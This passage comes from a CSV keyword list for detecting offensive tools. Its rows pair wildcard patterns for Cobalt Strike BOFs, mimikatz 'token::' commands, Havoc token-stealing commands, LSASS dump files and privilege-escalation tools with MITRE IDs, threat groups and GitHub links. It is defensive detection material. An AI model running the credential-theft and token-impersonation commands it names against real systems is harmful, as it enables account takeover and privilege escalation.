TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*tmp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Tmprovider.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*to_powershell.ducky_script*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*toggle_privileges.cna*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*toggle_privileges_bof.*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*Toggle_Token_Privileges_BOF*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*ToggleWDigest*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*Tojan:Win32/Goodkit*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*token find-tokens*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token impersonate *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token privs-get*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token privs-list*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token steal *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token* -CreateProcess * -ProcessId *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*token* -ImpersonateUser -Username *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*token::elevate*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::revert*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::whoami*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*TokenDump.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*TokenKidnapping.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*TokenKidnapping.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*TokenKidnapping.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*tokenprivs.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*tokenprivs.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*TokenStealing.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*TokenStealing.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*TokenStomp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*TokenStripBOF/src*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"*TokenTactics.psd1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics.psm1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics-main.zip*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Tokenvator*","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator*.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.csproj*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.git*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.pdb*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.Plugins*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.Resources*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator.sln*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Tokenvator/MonkeyWorks*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*token-vault steal*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*token-vault.cna*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*token-vault.x64.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 